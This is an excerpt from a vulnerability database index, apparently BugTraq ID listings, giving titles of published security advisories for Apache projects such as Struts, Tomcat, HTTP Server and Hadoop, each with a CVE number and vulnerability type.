14536| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
14537| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
14538| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
14539| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
14540| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
14541| [100447] Apache2Triad Multiple Security Vulnerabilities
14542| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
14543| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
14544| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
14545| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
14546| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
14547| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
14548| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
14549| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
14550| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
14551| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
14552| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
14553| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
14554| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
14555| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
14556| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
14557| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
14558| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
14559| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
14560| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
14561| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
14562| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
14563| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
14564| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
14565| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
14566| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
14567| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
14568| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
14569| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
14570| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
14571| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
14572| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
14573| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
14574| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
14575| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
14576| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
14577| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
14578| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
14579| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
14580| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
14581| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
14582| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
14583| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
14584| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
14585| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
14586| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
14587| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
14588| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
14589| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
14590| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
14591| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
14592| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
14593| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
14594| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
14595| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
14596| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
14597| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
14598| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
14599| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
14600| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
14601| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
14602| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
14603| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
14604| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
14605| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
14606| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
14607| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
14608| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
14609| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
14610| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
14611| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
14612| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
14613| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
14614| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
14615| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
14616| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
14617| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
14618| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
14619| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
14620| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
14621| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
14622| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
14623| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
14624| [95675] Apache Struts Remote Code Execution Vulnerability
14625| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
14626| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
14627| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
14628| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
14629| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
14630| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
14631| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
14632| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
14633| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
14634| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
14635| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
14636| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
14637| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
14638| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
14639| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
14640| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
14641| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
14642| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
14643| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
14644| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
14645| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
14646| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
14647| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
14648| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
14649| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
14650| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
14651| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
14652| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
14653| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
14654| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
14655| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
14656| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
14657| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
14658| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
14659| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
14660| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
14661| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
14662| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
14663| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
14664| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
14665| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
14666| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
14667| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
14668| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
14669| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
14670| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
14671| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
14672| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
14673| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
14674| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
14675| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
14676| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
14677| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
14678| [91736] Apache XML-RPC Multiple Security Vulnerabilities
14679| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
14680| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
14681| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
14682| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
14683| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
14684| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
14685| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
14686| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
14687| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
14688| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
14689| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
14690| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
14691| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
14692| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
14693| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
14694| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
14695| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
14696| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
14697| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
14698| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
14699| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
14700| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
14701| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
14702| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
14703| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
14704| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
14705| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
14706| [90482] Apache CVE-2004-1387 Local Security Vulnerability
14707| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
14708| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
14709| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
14710| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
14711| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
14712| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
14713| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
14714| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
14715| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
14716| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
14717| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
14718| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
14719| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
14720| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
14721| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
14722| [86399] Apache CVE-2007-1743 Local Security Vulnerability
14723| [86397] Apache CVE-2007-1742 Local Security Vulnerability
14724| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
14725| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
14726| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
14727| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
14728| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
14729| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
14730| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
14731| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
14732| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
14733| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
14734| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
14735| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
14736| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
14737| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
14738| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
14739| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
14740| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
14741| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
14742| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
14743| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
14744| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
14745| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
14746| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
14747| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
14748| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
14749| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
14750| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
14751| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
14752| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
14753| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
14754| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
14755| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
14756| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
14757| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
14758| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
14759| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
14760| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
14761| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
14762| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
14763| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
14764| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
14765| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
14766| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
14767| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
14768| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
14769| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
14770| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
14771| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
14772| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
14773| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
14774| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
14775| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
14776| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
14777| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
14778| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
14779| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
14780| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
14781| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
14782| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
14783| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
14784| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
14785| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
14786| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
14787| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
14788| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
14789| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
14790| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
14791| [76933] Apache James Server Unspecified Command Execution Vulnerability
14792| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
14793| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
14794| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
14795| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
14796| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
14797| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
14798| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
14799| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
14800| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
14801| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
14802| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
14803| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
14804| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
14805| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
14806| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
14807| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
14808| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
14809| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
14810| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
14811| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
14812| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
14813| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
14814| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
14815| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
14816| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
14817| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
14818| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
14819| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
14820| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
14821| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
14822| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
14823| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
14824| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
14825| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
14826| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
14827| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
14828| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
14829| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
14830| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
14831| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
14832| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
14833| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
14834| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
14835| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
14836| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
14837| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
14838| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
14839| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
14840| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
14841| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
14842| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
14843| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
14844| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
14845| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
14846| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
14847| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
14848| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
14849| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
14850| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
14851| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
14852| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
14853| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
14854| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
14855| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
14856| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
14857| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
14858| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
14859| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
14860| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
14861| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
14862| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
14863| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
14864| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
14865| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
14866| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
14867| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
14868| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
14869| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
14870| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
14871| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
14872| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
14873| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
14874| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
14875| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
14876| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
14877| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
14878| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
14879| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
14880| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
14881| [68229] Apache Harmony PRNG Entropy Weakness
14882| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
14883| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
14884| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
14885| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
14886| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
14887| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
14888| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
14889| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
14890| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
14891| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
14892| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
14893| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
14894| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
14895| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
14896| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
14897| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
14898| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
14899| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
14900| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
14901| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
14902| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
14903| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
14904| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
14905| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
14906| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
